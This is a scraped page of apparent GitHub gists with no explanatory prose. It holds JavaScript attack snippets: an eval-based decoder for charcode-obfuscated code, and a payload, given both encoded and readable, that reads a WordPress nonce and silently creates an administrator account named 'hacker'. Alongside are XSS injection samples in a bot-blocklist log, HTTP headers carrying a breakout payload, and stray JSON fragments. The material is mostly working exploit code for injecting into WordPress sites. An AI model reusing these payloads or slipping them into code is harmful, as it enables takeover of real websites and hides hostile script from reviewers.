This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function decodeAndExecute(encodedStr) { | |
| let decodedCode = decodeURIComponent(encodedStr); // Decodes the URL-safe string back | |
| eval(decodedCode); // Executes the decoded JavaScript code | |
| } | |
| // Example usage with a decoded URL-safe string | |
| let encodedStr = "eval%28String.fromCharCode%2897%2C%20108%2C%20101%2C%20114%2C%20116%29%29"; | |
| decodeAndExecute(encodedStr); // Executes the decoded alert("Hello") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| eval(String.fromCharCode(97, 108, 101, 114, 116)); | |
| // Output: alert("Hello"); (executes the alert) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 108,101,116,32,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,59,99,111,110,115,116,32,114,101,113,117,101,115,116,85,82,76,61,34,47,119,112,45,97,100,109,105,110,47,117,115,101,114,45,110,101,119,46,112,104,112,34,44,110,111,110,99,101,82,101,103,101,120,61,47,115,101,114,34,32,118,97,108,117,101,61,34,40,91,94,34,93,42,63,41,34,47,103,59,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,71,69,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,49,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,41,59,99,111,110,115,116,32,110,111,110,99,101,77,97,116,99,104,61,110,111,110,99,101,82,101,103,101,120,46,101,120,101,99,40,97,106,97,120,82,101,113,117,101,115,116,46,114,101,115,112,111,110,115,101,84,101,120,116,41,44,110,111,110,99,101,61,110,111,110,99,101,77,97,116,99,104,91,49,93,44,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let ajaxRequest=new XMLHttpRequest();const requestURL="/wp-admin/user-new.php";const nonceRegex=/ser" value="([^"]*?)"/g;ajaxRequest.open("GET",requestURL,!1);ajaxRequest.send();const nonceMatch=nonceRegex.exec(ajaxRequest.responseText);const nonce=nonceMatch[1];const params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&[email protected]"+"&pass1=hackerpass&pass2=hackerpass&role=administrator";ajaxRequest=new XMLHttpRequest();ajaxRequest.open("POST",requestURL,!0);ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded");ajaxRequest.send(params) | |
| //Use the js minify option |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Step 1: Extract nonce via GET request | |
| let ajaxRequest = new XMLHttpRequest(); | |
| const requestURL = "/wp-admin/user-new.php"; | |
| const nonceRegex = /ser" value="([^"]*?)"/g; | |
| ajaxRequest.open("GET", requestURL, false); // Synchronous GET request | |
| ajaxRequest.send(); | |
| const nonceMatch = nonceRegex.exec(ajaxRequest.responseText); | |
| const nonce = nonceMatch[1]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <pre>2025-11-01 1:27:43 Blocked bot with IP localhost -- matched user agent #bot </pre> | |
| <img src=a onerror=alert('1')> found in blocklist. | |
| </div> | |
| </span> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: bot <\/pre>payload | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Referer: http://localhost/<\/pre>payload |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /phpinfo.php HTTP/1.0 | |
| Content-Type: multipart/form-data; boundary=--------------------------- 4db367605ae | |
| Content-Length: 196 | |
| -----------------------------4db367605ae | |
| Content-Disposition: form-data; name="whatevername"; filename="testing.txt" Content-Type: text/plain | |
| Security Test -----------------------------4db367605ae |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { "id": | |
| "username":"[email protected]" | |
| "email":"[email protected] | |
| "active":true, | |
| "registered":"Fidel C." | |
| "role":"03" | |
| "site":[ | |
| ], | |
| "company":[ | |
| ] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "HELLKO" | |
| "account": "jkk" | |
| "active": "true" | |
| } |
NewerOlder